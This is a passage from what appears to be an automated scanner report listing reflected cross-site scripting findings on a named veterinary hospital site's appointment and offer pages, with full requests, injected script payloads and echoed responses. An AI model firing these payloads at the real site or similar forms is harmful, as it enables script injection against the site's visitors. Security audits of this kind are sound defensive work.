The value of the altphone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 624cd"><script>alert(1)</script>82000bb6032 was submitted in the altphone parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hanson/appt.html?altphone=624cd"><script>alert(1)</script>82000bb6032 &m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=ht
tp:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRe
quest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:52:16 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=4udruo5a6bh9ud6vq7kq83b113; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 24991 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input name="altphone" id="altphone" type="text" size="30" maxlength="20" value="624cd"><script>alert(1)</script>82000bb6032 " />...[SNIP]...
2.4. http://www.vcahospitals.com/hanson/appt.html [ampm1 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/appt.html
Issue detail
The value of the ampm1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bae55"><script>alert(1)</script>803b193c3aa was submitted in the ampm1 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hanson/appt.html?altphone=&m1=AMbae55"><script>alert(1)</script>803b193c3aa &m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=ht
tp:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRe
quest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:52:21 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=cr4nhjr58mse15chetc65pdm60; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 24948 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html?altphone=&m1=AMbae55"><script>alert(1)</script>803b193c3aa &m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2...[SNIP]...
2.5. http://www.vcahospitals.com/hanson/appt.html [ampm2 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/appt.html
Issue detail
The value of the ampm2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddea7"><script>alert(1)</script>769a3fc6d44 was submitted in the ampm2 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hanson/appt.html?altphone=&m1=AM&m2=AMddea7"><script>alert(1)</script>769a3fc6d44 &m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=ht
tp:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRe
quest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:52:26 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=mig2fnj5prvum7phmej9acrtd7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 24948 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html?altphone=&m1=AM&m2=AMddea7"><script>alert(1)</script>769a3fc6d44 &m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.v...[SNIP]...
2.6. http://www.vcahospitals.com/hanson/appt.html [ampm3 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/appt.html
Issue detail
The value of the ampm3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a25b"><script>alert(1)</script>18b15d79637 was submitted in the ampm3 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hanson/appt.html?altphone=&m1=AM&m2=AM&m3=AM2a25b"><script>alert(1)</script>18b15d79637 &appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=ht
tp:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRe
quest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:52:31 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=795pv82b0poc4jb53dq6ne47c3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 24948 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html?altphone=&m1=AM&m2=AM&m3=AM2a25b"><script>alert(1)</script>18b15d79637 &appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospita...[SNIP]...
2.7. http://www.vcahospitals.com/hanson/appt.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/appt.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 994c2"><script>alert(1)</script>860b1adcd7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hanson/appt.html?994c2"><script>alert(1)</script>860b1adcd7c =1 HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/hanson Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:20 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 20916 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html?994c2"><script>alert(1)</script>860b1adcd7c =1" />...[SNIP]...
2.8. http://www.vcahospitals.com/hanson/offer.html [addr parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/offer.html
Issue detail
The value of the addr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 998d7"><script>alert(1)</script>24a59a02e19 was submitted in the addr parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
